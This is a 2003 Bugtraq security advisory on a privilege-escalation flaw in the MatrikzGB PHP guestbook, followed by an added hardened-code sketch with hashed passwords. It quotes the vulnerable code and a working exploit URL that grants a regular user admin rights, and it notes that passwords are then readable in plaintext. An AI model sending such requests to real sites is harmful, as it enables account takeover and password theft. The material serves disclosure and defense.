[31244] in bugtraq
Security hole in MatrikzGB
daemon@ATHENA.MIT.EDU (Stephan S.)
Mon Aug 18 12:16:47 2003
Date: 16 Aug 2003 01:51:49 -0000
Message-ID: <20030816015149.6998.qmail@www.securityfocus.com>
From: "Stephan S." <mastamorphixx@web.de>
To: bugtraq@securityfocus.com
Security hole in MatrikzGB Guestbook
15/8/2003
Vulnerable Versions:
Version 2.0 and prior
Version 3 (not tested)
Summary:
MatrikzGB was written by Thomas Hempel for
www.onsite.org.
A bug in index.php allows a user with a regular user
account to give administrator rights to himself.
Details:
The bug is in the user edit function:
Every regular user is allowed to change rights or make any
other modification to existing users.
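    // $new_rights is used as supplied, with no check of the caller's own rights.
    if ($new_username != "" && $new_password != "") {
        create_user($new_username,$new_password,$new_rights,$entry_index);
        echo "<tr><th class=\"ok\">Der Benutzer wurde angelegt!"; // "The user has been created!"
    }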
Example:
This is an example of how to give administrator rights to
yourself.
http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass
Comment:
Once you have administrator rights, you can look up the
passwords of all other users; they are in plaintext.
Vendor status:
Vendor has been contacted.
by Stephan "mastamorphixx" S., member of
www.lostkey.org
contact: mastamorphixx@web.de
irc.euirc.de #lostkey
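
Added example (not part of the original advisory and not MatrikzGB's own code): a sketch of the authorization check the user edit path lacks, with passwords kept as hashes instead of plaintext. The request parameter names come from the advisory; authenticate(), update_user() and the in-memory $users store are hypothetical names with constructed data.

```php
<?php
// Added illustration: in-memory stand-in for the guestbook's user store (constructed data).
// Passwords are kept as password_hash() digests rather than plaintext.
$users = [
    'siteadmin'   => ['hash' => password_hash('constructed-admin-pw', PASSWORD_DEFAULT), 'rights' => 'admin'],
    'regularuser' => ['hash' => password_hash('regularpass', PASSWORD_DEFAULT), 'rights' => 'user'],
];

// Hypothetical helper: returns the authenticated account name, or null on bad credentials.
function authenticate(array $users, string $user, string $pass): ?string {
    if (!isset($users[$user])) {
        return null;
    }
    return password_verify($pass, $users[$user]['hash']) ? $user : null;
}

// Hypothetical hardened edit path: the caller's stored rights decide what may change.
function update_user(array &$users, ?string $caller, string $name, string $pass, string $rights): string {
    if ($caller === null) {
        return 'denied: not authenticated';
    }
    if ($name === '' || $pass === '') {
        return 'denied: empty field';
    }
    if (!in_array($rights, ['user', 'admin'], true)) {
        return 'denied: unknown rights value';
    }
    $isAdmin = $users[$caller]['rights'] === 'admin';
    if (!$isAdmin && $name !== $caller) {
        return 'denied: not your account';          // no edits to other users
    }
    if (!$isAdmin && $rights !== $users[$caller]['rights']) {
        return 'denied: rights change needs admin'; // request-supplied new_rights is not trusted
    }
    $users[$name] = ['hash' => password_hash($pass, PASSWORD_DEFAULT), 'rights' => $rights];
    return 'ok';
}

// Constructed requests using the advisory's parameter names.
$requests = [
    ['user' => 'regularuser', 'pass' => 'regularpass', 'new_username' => 'regularuser', 'new_password' => 'regularpass', 'new_rights' => 'admin'],
    ['user' => 'regularuser', 'pass' => 'regularpass', 'new_username' => 'regularuser', 'new_password' => 'changed-pw', 'new_rights' => 'user'],
    ['user' => 'siteadmin', 'pass' => 'constructed-admin-pw', 'new_username' => 'moderator', 'new_password' => 'constructed-pw', 'new_rights' => 'admin'],
];
foreach ($requests as $r) {
    $caller = authenticate($users, $r['user'], $r['pass']);
    echo $r['user'], ' -> ', $r['new_username'], ' (', $r['new_rights'], '): ',
        update_user($users, $caller, $r['new_username'], $r['new_password'], $r['new_rights']), "\n";
}
```

The first constructed request carries the same parameters as the advisory's example and is refused because the caller's stored rights are "user"; the password change and the administrator's request go through.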